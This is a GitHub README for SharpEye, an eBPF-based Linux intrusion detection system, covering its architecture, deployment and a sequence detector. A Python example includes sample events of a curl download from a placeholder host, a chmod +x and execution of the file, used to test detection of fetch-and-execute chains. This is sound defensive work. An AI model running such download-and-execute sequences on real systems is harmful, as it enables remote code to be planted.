https://github.com/sginnora/sharpeye
SharpEye: Advanced Linux Intrusion Detection and Threat Hunting System
anomaly-detection cloud-native cryptominer-detection cybersecurity ebpf golang ids intrusion-detection kubernetes linux machine-learning monitoring python rootkit-detection security sigma-rules threat-hunting
- Host: GitHub
- URL: https://github.com/sginnora/sharpeye
- Owner: sgInnora
- License: mit
- Created: 2025-05-08T01:25:22.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2026-01-18T01:40:43.000Z (5 months ago)
- Last Synced: 2026-01-18T13:49:37.802Z (5 months ago)
- Topics: anomaly-detection, cloud-native, cryptominer-detection, cybersecurity, ebpf, golang, ids, intrusion-detection, kubernetes, linux, machine-learning, monitoring, python, rootkit-detection, security, sigma-rules, threat-hunting
- Language: Python
- Size: 847 KB
- Stars: 169
- Watchers: 3
- Forks: 6
- Open Issues: 0
Metadata Files:
- Readme: README.md
- Changelog: CHANGELOG.md
- Contributing: CONTRIBUTING.md
- License: LICENSE
- Audit: AUDIT_REPORT.md
- Security: SECURITY.md
README
# SharpEye: Gen 4 Cloud-Native IDS
[English](README.md) | [中文](README_zh.md)
**SharpEye** is an advanced Linux Intrusion Detection System (IDS) engineered for modern cloud-native environments. It represents a paradigm shift from polling-based monitoring to real-time kernel telemetry using **eBPF (CO-RE)**, augmented by a **Hybrid AI Brain**.
## Key Features
- **Hybrid Brain Architecture**:
  - **Rule Engine**: Deterministic detection using Sigma-compatible YAML rules.
  - **Anomaly AI**: Unsupervised Isolation Forest for detecting statistical outliers.
  - **Sequence AI**: Hidden Markov Models (HMM) for detecting malicious command chains.
- **eBPF Vision**:
  - High-performance kernel telemetry using `sys_enter_execve` tracepoints.
  - Implemented as a lightweight **Go Sidecar** (Probe) for minimal overhead.
- **Distributed Orchestration**:
  - Kubernetes DaemonSet ready.
  - Heartbeat and Alert reporting via REST API.
  - Centralized Threat Intelligence integration.
- **High Performance**:
  - Capable of processing 600k+ EPS on a single core (Rule Engine).
  - Adaptive sampling for AI modules in high-load scenarios.
## Why SharpEye?
| Feature | Traditional IDS (Snort/Suricata) | Legacy HIDS (OSSEC/Wazuh) | **SharpEye (Gen 4)** |
| :--- | :--- | :--- | :--- |
| **Visibility** | Network Packets | Log Files / Syscalls (Auditd) | **Kernel Tracepoints (eBPF)** |
| **Performance** | High (Deep Packet Inspection) | Medium (Auditd Overhead) | **Extreme (Zero-Copy)** |
| **Detection** | Signatures Only | Rules + File Integrity | **Hybrid (Sigma Rules + AI)** |
| **Unknown Threats** | Misses 0-days | Misses logic bugs | **Detects Anomalies** |
| **Deployment** | Network Tap | Heavy Agent | **Lightweight Sidecar** |
## Architecture
SharpEye follows a decoupled **Brain-Eye** architecture:
- **The Eye (Probe)**: A Go binary running eBPF programs. It captures kernel events and forwards them to user space via Perf Buffers.
- **The Brain (Engine)**: A Python process that ingests the event stream, applies detection logic, and manages state (sessions, network connections).
See [ARCHITECTURE.md](docs/ARCHITECTURE.md) for a deep dive.
## Installation
### Prerequisites
- Linux Kernel 5.8+ (BTF enabled recommended)
- Docker / Kubernetes
### Quick Start (Docker)
```bash
# Build the container (Multi-stage build)
docker build -t sharpeye:latest -f Dockerfile.k8s .
# Run in privileged mode (Required for eBPF)
docker run --privileged \
-v /sys/kernel/debug:/sys/kernel/debug \
-v /lib/modules:/lib/modules:ro \
sharpeye:latest
```
### Kubernetes Deployment
```bash
kubectl apply -f k8s/daemonset.yaml
```
## AI Capabilities
SharpEye features a self-learning mechanism:
1. **Cold Start**: Automatically collects the first 1000 process events to train a baseline model.
2. **Online Learning**: Retrains models every 1000 events to adapt to drift.
3. **Sequence Analysis**: Tracks `PPID` sessions to detect anomalous command chains (e.g., `curl` -> `chmod` -> `exec`).
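The sequence-analysis step above, as an added example that is not part of SharpEye's own code: a minimal tracker that groups execve events into sessions by walking the PPID chain, labels each step, and raises an alert when a session's steps contain the `curl` -> `chmod` -> `exec` chain in order. The event field names (`pid`, `ppid`, `comm`, `args`) and the sample events are constructed for this example and are not the project's real event schema.

```python
from collections import defaultdict

# Constructed sample of execve events in the order a probe would emit them. The
# field names (pid, ppid, comm, args) are assumptions, not SharpEye's real schema.
EVENTS = [
    {"pid": 100, "ppid": 1, "comm": "bash", "args": ["bash"]},
    {"pid": 101, "ppid": 100, "comm": "curl", "args": ["curl", "-o", "/tmp/x", "http://example.invalid/x"]},
    {"pid": 102, "ppid": 100, "comm": "chmod", "args": ["chmod", "+x", "/tmp/x"]},
    {"pid": 103, "ppid": 100, "comm": "x", "args": ["/tmp/x"]},
    {"pid": 200, "ppid": 1, "comm": "bash", "args": ["bash"]},
    {"pid": 201, "ppid": 200, "comm": "chmod", "args": ["chmod", "644", "/etc/motd"]},
]
SUSPICIOUS_CHAIN = ("curl", "chmod", "exec")  # must appear in this order, gaps allowed

def contains_chain(labels, chain):
    it = iter(labels)  # subsequence match: each step must be found after the previous one
    return all(step in it for step in chain)

class SessionTracker:
    """Groups execve events into sessions via the PPID chain and labels each step."""
    def __init__(self):
        self.parent = {}                       # pid -> ppid observed so far
        self.labels = defaultdict(list)        # session root -> ordered step labels
        self.chmod_targets = defaultdict(set)  # session root -> paths made executable

    def root_of(self, pid):
        # Walk up the PPID chain to the oldest ancestor we have seen an event for.
        while self.parent.get(pid) in self.parent:
            pid = self.parent[pid]
        return pid

    def label(self, root, event):
        comm, args = event["comm"], event["args"]
        if comm == "chmod" and "+x" in args:
            self.chmod_targets[root].add(args[-1])
        elif args[0] in self.chmod_targets[root]:
            return "exec"  # running a file this same session just made executable
        return comm

    def handle(self, event):
        """Ingest one event; return an alert dict if its session now matches the chain."""
        self.parent[event["pid"]] = event["ppid"]
        root = self.root_of(event["pid"])
        self.labels[root].append(self.label(root, event))
        if contains_chain(self.labels[root], SUSPICIOUS_CHAIN):
            return {"session": root, "pid": event["pid"], "chain": list(self.labels[root])}

def scan(events):
    # Feed events through one tracker and collect every alert raised.
    return [a for a in map(SessionTracker().handle, events) if a]
```

Running `scan(EVENTS)` yields one alert for session 100 at the exec of `/tmp/x`; the second session only runs a non-executable `chmod` and stays silent.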
## Contributing
We welcome contributions! Please see [CONTRIBUTING.md](CONTRIBUTING.md) for details on setting up the dev environment.
## License
MIT License. See [LICENSE](LICENSE) for details.